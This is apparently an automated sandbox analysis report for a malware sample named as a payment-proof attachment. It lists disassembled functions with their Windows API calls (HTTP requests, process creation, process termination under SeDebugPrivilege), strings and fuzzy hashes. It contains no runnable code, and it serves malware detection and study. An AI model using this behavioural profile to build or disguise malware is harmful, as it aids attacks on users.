Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 3c6e1ec66294774dee7e2b43cbe15287d293f4c5d8375b1a0503a3902ac3041b
Instruction ID: cfc78c39b5dbf614cbd0ee1ba6ad7fb8eef26899e71bbc0655e040f99a143f48
Opcode Fuzzy Hash: 3c6e1ec66294774dee7e2b43cbe15287d293f4c5d8375b1a0503a3902ac3041b
Instruction Fuzzy Hash: 2671C231400205EFDF21DFA8C981FEA7BB5FF49364F2442AAED99562AAC7358C41DB50

Function 0101ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FCB34E: GetWindowLongW.USER32(?,000000EB), ref: 00FCB35F

Part of subcall function 00FCB63C: GetCursorPos.USER32(000000FF), ref: 00FCB64F
Part of subcall function 00FCB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00FCB66C
Part of subcall function 00FCB63C: GetAsyncKeyState.USER32(00000001), ref: 00FCB691
Part of subcall function 00FCB63C: GetAsyncKeyState.USER32(00000002), ref: 00FCB69F

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0101ED3C
ImageList_EndDrag.COMCTL32 ref: 0101ED42
ReleaseCapture.USER32 ref: 0101ED48
SetWindowTextW.USER32(?,00000000), ref: 0101EDF0
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0101EE03
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0101EEDC

Strings

@GUI_DRAGFILE, xrefs: 0101EE77
@GUI_DROPID, xrefs: 0101EE33

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 80e9c1725340ccf72bd062dffd79cae5581313cd67881dd40b392804edcb539a
Instruction ID: 5c6b91d66124c9c74468706a1c7413cc1dd97b0fc73c579916ab497fc20347e1
Opcode Fuzzy Hash: 80e9c1725340ccf72bd062dffd79cae5581313cd67881dd40b392804edcb539a
Instruction Fuzzy Hash: BA519970204300AFD720DF24DC86FAA77E9FB88714F40491DFA95972E5DB799904DB52

Function 010045C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 010045FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0100462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0100466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 01004682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0100468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 010046BF
InternetCloseHandle.WININET(00000000), ref: 01004706

Part of subcall function 01005052: GetLastError.KERNEL32(?,?,010043CC,00000000,00000000,00000001), ref: 01005067

Strings

, xrefs: 010046B8

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: 5c8c68df5eb787bf43319ef79f832de2dd9d70849e19c330e324cfad7a94ba21
Instruction ID: f929c974156eeedef0fd02595817751f1d33eab4f8ec76a4ffcfe3f02151f15a
Opcode Fuzzy Hash: 5c8c68df5eb787bf43319ef79f832de2dd9d70849e19c330e324cfad7a94ba21
Instruction Fuzzy Hash: E3415EB1501205BBFB139F94CC85FBB7BACFB08344F004166FA85DA185E77599448BA9

Function 0100B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0104DC00), ref: 0100B715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0104DC00), ref: 0100B749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0100B8C1
SysFreeString.OLEAUT32(?), ref: 0100B8EB

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: efe0765a770b45997d16caf69acd37f3aa741682a58ec249c0953901e7929e0a
Instruction ID: 6edd9aaacfd07168118dcad48d41903a1882acf2e2a8acc39581af4ea95d3532
Opcode Fuzzy Hash: efe0765a770b45997d16caf69acd37f3aa741682a58ec249c0953901e7929e0a
Instruction Fuzzy Hash: 57F16179A00109EFDF05DF94C884EAEBBB9FF49311F148098F955AB291DB35AE41CB90

Function 010124D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 010124F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 01012688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 010126AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 010126EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0101270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0101286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 010128A1
CloseHandle.KERNEL32(?), ref: 010128D0
CloseHandle.KERNEL32(?), ref: 01012947

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 73f5b600a1031bc4ea8f7cbad7109c46f2729f0e5a9a2d701705c66663e5fc1e
Instruction ID: a05a89f69e470827aeaa3d8111f21e538326b328434faf6a913a6b221aa9aea4
Opcode Fuzzy Hash: 73f5b600a1031bc4ea8f7cbad7109c46f2729f0e5a9a2d701705c66663e5fc1e
Instruction Fuzzy Hash: A9D1D031604201DFCB14EF28C991B6EBBE5BF84310F18885DF9999B2A6DB39DC40CB52

Function 0101B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0101B3F4

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 1d4209bf66797c285ba5e62453013afb775a1715a65539c47e45c11830625492
Instruction ID: ce677a23a0e380ea22574f5a1780fbaeb66a9302364513ce7587e0cdcd1dbe57
Opcode Fuzzy Hash: 1d4209bf66797c285ba5e62453013afb775a1715a65539c47e45c11830625492
Instruction Fuzzy Hash: 7051DF30A40205BBEF309F68CC85BAD3FB8BB04324F548155FAE5E61E9CB79E9508B50

Function 00FCA699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0102DB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0102DB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0102DB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0102DB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0102DB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,00FCA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0102DBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0102DBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,00FCA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0102DBC8

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: a6c8bda83b1d5df1507073fdfbe8b9dddbebf9f6af9f4efe07f1b7edd5c1d990
Instruction ID: 678105a08413013833b92da89a7768de717a4971ea85d8f7b923e2812354ea3b
Opcode Fuzzy Hash: a6c8bda83b1d5df1507073fdfbe8b9dddbebf9f6af9f4efe07f1b7edd5c1d990
Instruction Fuzzy Hash: 3A517A30A00209EFDB21DFA8CD92FAA77F9BF48754F100518F986962D1D775AC90EB50

Function 00FF7555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00FF6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FF5FA6,?), ref: 00FF6ED8

Part of subcall function 00FF6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FF5FA6,?), ref: 00FF6EF1

Part of subcall function 00FF72CB: GetFileAttributesW.KERNEL32(?,00FF6019), ref: 00FF72CC

lstrcmpiW.KERNEL32(?,?), ref: 00FF75CA
_wcscmp.LIBCMT ref: 00FF75E2
MoveFileW.KERNEL32(?,?), ref: 00FF75FB

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: be10dbf2ae3d72d6ed8b5083a5469daa22b6c6da5d433f0413e515d3bb0d0084
Instruction ID: 91e453dc960a7f715fb62aa446b5ee36ae23b7847b377c3fff099f59850e0038
Opcode Fuzzy Hash: be10dbf2ae3d72d6ed8b5083a5469daa22b6c6da5d433f0413e515d3bb0d0084
Instruction Fuzzy Hash: 4A5101B2A0921D9ADF50EA94DC41DEEB3BCAF08320F0441AAF605E3151DB7496C5DB64

Function 00FCEA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0102DAD1,00000004,00000000,00000000), ref: 00FCEAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0102DAD1,00000004,00000000,00000000), ref: 00FCEB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0102DAD1,00000004,00000000,00000000), ref: 0102DC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0102DAD1,00000004,00000000,00000000), ref: 0102DCF2

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 06504d2bf0fe5f6c022bf472eaad4fb16a3851606c9ab57eca8ccec751207953
Instruction ID: 32d57f4de250eceda180462afa9d549e6fb867a159fb2a397ca03a623e643d1b
Opcode Fuzzy Hash: 06504d2bf0fe5f6c022bf472eaad4fb16a3851606c9ab57eca8ccec751207953
Instruction Fuzzy Hash: 35411871A086839AD73947688B8FF7A7A9ABBC5314F69040DF1C783591C679BC40E711

Function 00FEB263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00FEAEF1,00000B00,?,?), ref: 00FEB26C
HeapAlloc.KERNEL32(00000000,?,00FEAEF1,00000B00,?,?), ref: 00FEB273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00FEAEF1,00000B00,?,?), ref: 00FEB288
GetCurrentProcess.KERNEL32(?,00000000,?,00FEAEF1,00000B00,?,?), ref: 00FEB290
DuplicateHandle.KERNEL32(00000000,?,00FEAEF1,00000B00,?,?), ref: 00FEB293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00FEAEF1,00000B00,?,?), ref: 00FEB2A3
GetCurrentProcess.KERNEL32(00FEAEF1,00000000,?,00FEAEF1,00000B00,?,?), ref: 00FEB2AB
DuplicateHandle.KERNEL32(00000000,?,00FEAEF1,00000B00,?,?), ref: 00FEB2AE
CreateThread.KERNEL32(00000000,00000000,00FEB2D4,00000000,00000000,00000000), ref: 00FEB2C8

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: a608cac7e45f2f59084e78b0f2a841d55526d071c5cfa6d3909411f77e9b1783
Instruction ID: 27e2c80490cf52abb40916f6c610c6aac8054a8ddd46e3e717cea2bbb40280cd
Opcode Fuzzy Hash: a608cac7e45f2f59084e78b0f2a841d55526d071c5cfa6d3909411f77e9b1783
Instruction Fuzzy Hash: C801B6B5640348BFE720ABA5DC49F6B7BACEB88711F418411FA45DB195CAB9DC00CB61

Function 0100C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0100C876, 0100C887
Not an Object type, xrefs: 0100C49E

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 201d024a7ed3f4425e41e2d85732252fe8c17aefc7619ac3765d62fab9d9adf4
Instruction ID: 1ec523ae098edf097e2d8e837f16c2c65398f1a85a008c3edfa7625d8684f4a5
Opcode Fuzzy Hash: 201d024a7ed3f4425e41e2d85732252fe8c17aefc7619ac3765d62fab9d9adf4
Instruction Fuzzy Hash: 47E1B471A002199BFF16DFA8CD80AAE77F5FF48314F1441A9FA85AB2C1D774A941CB90

Function 0100BB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0100BB5C
VariantInit.OLEAUT32(?), ref: 0100BC2D
VariantInit.OLEAUT32(?), ref: 0100BD2E
VariantClear.OLEAUT32(?), ref: 0100BD38
VariantClear.OLEAUT32(?), ref: 0100BD99

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0100BD11
Null Object assignment in FOR..IN loop, xrefs: 0100BBBD, 0100BCEB, 0100BDA7

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: e1baafbe7af144c9e789353653cea5d112aa1e45a2982e21ab8dd982b8f472f9
Instruction ID: e329402aac9f1b3287258add4e7885d33c335b9fc1dc46773fb35d1380d342e5
Opcode Fuzzy Hash: e1baafbe7af144c9e789353653cea5d112aa1e45a2982e21ab8dd982b8f472f9
Instruction Fuzzy Hash: D391A575A00209ABEF26DF95CC44FAEBBB8EF45710F00855AF555AB281DB709940CF91

Function 01019A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01019B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 01019B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01019B47
_wcscat.LIBCMT ref: 01019BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 01019BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 01019BE7

Strings

SysListView32, xrefs: 01019AEB

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 1585a0fb394ee1d7f7c83495422465cd11a403ba0b91c363afdef6a7a72a4ce6
Instruction ID: 8b7b882a267c3ef803f1204b491474e0f1314787c709d7d49ed823e351e4bf27
Opcode Fuzzy Hash: 1585a0fb394ee1d7f7c83495422465cd11a403ba0b91c363afdef6a7a72a4ce6
Instruction Fuzzy Hash: 4941A171900308ABEF219FA8CC85FEE7BE9EF08354F44046AF585A7285C6799984CB60

Function 0101172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00FF6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00FF6554
Part of subcall function 00FF6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00FF6564
Part of subcall function 00FF6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00FF65F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0101179A
GetLastError.KERNEL32 ref: 010117AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 010117D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 01011855
GetLastError.KERNEL32(00000000), ref: 01011860
CloseHandle.KERNEL32(00000000), ref: 01011895

Strings

SeDebugPrivilege, xrefs: 010117B8

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 7198a10662db21a33a266499c5321b7c6c6e6faf25b57a2cac28dae18111cd3c
Instruction ID: 10305b5f1e4d327646b0d504acd0849373d1c09f8d939047009e616b2bcb102b
Opcode Fuzzy Hash: 7198a10662db21a33a266499c5321b7c6c6e6faf25b57a2cac28dae18111cd3c
Instruction Fuzzy Hash: 1441AF71600205AFDB15EFA8CD96FBDB7A5AF44310F088099FA469F3D2DB7D99009B90

Function 00FF5819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00FF58B8

Strings

warning, xrefs: 00FF58A1
blank, xrefs: 00FF583A
info, xrefs: 00FF5859
question, xrefs: 00FF5871
stop, xrefs: 00FF5889

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: cfbdfb851a679c93282683e38b948279f603e57e71074c7c50e8b785f21f2a2b
Instruction ID: af456f5c586e863f794df524b7767bc45b3a3a03783c85024eb45926ce76298b
Opcode Fuzzy Hash: cfbdfb851a679c93282683e38b948279f603e57e71074c7c50e8b785f21f2a2b
Instruction Fuzzy Hash: DD11003260974ABAE7115B559C42EBA379CEF15B74F30003BF785E9251F7649D00E264

Function 00FFA729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00FFA806

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 6b5079ef9ad97a5a19c27945540bdcd809e7a7d7badc97bc105d15b17748fb22
Instruction ID: 2ea739dab1f125d537ca99bbff19cf1f549b3ec0b6bea9b7b1010489238b5690
Opcode Fuzzy Hash: 6b5079ef9ad97a5a19c27945540bdcd809e7a7d7badc97bc105d15b17748fb22
Instruction Fuzzy Hash: 3BC1ADB5A0420ADFDB14DF98C481BBEB7F4FF08311F208069E60AE7261D779A945DB91

Function 00FF6B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00FF6B63
LoadStringW.USER32(00000000), ref: 00FF6B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00FF6B80
